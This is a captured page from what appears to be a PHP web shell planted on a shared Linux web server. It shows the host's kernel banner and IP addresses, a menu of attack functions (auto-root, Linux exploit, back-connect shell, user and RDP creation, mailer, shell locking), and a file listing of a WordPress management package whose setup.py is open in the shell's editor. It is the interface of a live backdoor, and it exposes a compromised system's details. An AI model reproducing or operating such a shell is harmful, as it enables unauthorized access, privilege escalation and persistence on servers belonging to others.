Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
dhwp /
[ HOME SHELL ]
Name
Size
Permission
Action
.idea
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxr-xr-x
dhwp
[ DIR ]
drwxr-xr-x
dhwp.egg-info
[ DIR ]
drwxr-xr-x
docker
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
env
[ DIR ]
drwxr-xr-x
etc
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitlab-ci.yml
197
B
-rw-rw-r--
.pycodestyle
36
B
-rw-rw-r--
CHANGELOG.md
51
B
-rw-rw-r--
Dockerfile
1.25
KB
-rw-rw-r--
Dockerfile.wordpress
222
B
-rw-rw-r--
LICENSE.md
1
B
-rw-rw-r--
MANIFEST.in
132
B
-rw-rw-r--
Makefile
731
B
-rw-rw-r--
README.md
3.49
KB
-rw-rw-r--
batch-config.yaml
300
B
-rw-rw-r--
build-dhwp-package.sh
1.4
KB
-rw-rw-r--
dhwp-exec.sh
44
B
-rwxrwxr-x
dhwp-init.sh
1.08
KB
-rwxrwxr-x
dhwp-shell.sh
59
B
-rwxrwxr-x
docker-compose.yml
1.57
KB
-rw-rw-r--
license.txt
19.47
KB
-rw-rw-r--
plugins.yaml
300
B
-rw-rw-r--
requirements-dev.txt
116
B
-rw-rw-r--
requirements.txt
58
B
-rw-rw-r--
setup.cfg
0
B
-rw-rw-r--
setup.py
725
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.py
from setuptools import setup, find_packages from dhwp.core.version import get_version VERSION = get_version() f = open('README.md', 'r') LONG_DESCRIPTION = f.read() f.close() setup( name='dhwp', version=VERSION, description='Dreamhost WP Management Tool', long_description=LONG_DESCRIPTION, long_description_content_type='text/markdown', author='Jordan Tardif', author_email='jordan@dreamhost.com', url='https://github.com/johndoe/myapp/', license='unlicensed', packages=find_packages(exclude=['ez_setup', 'tests*']), package_data={'dhwp': ['templates/*']}, include_package_data=True, entry_points=""" [console_scripts] dhwp = dhwp.main:main """, )
Close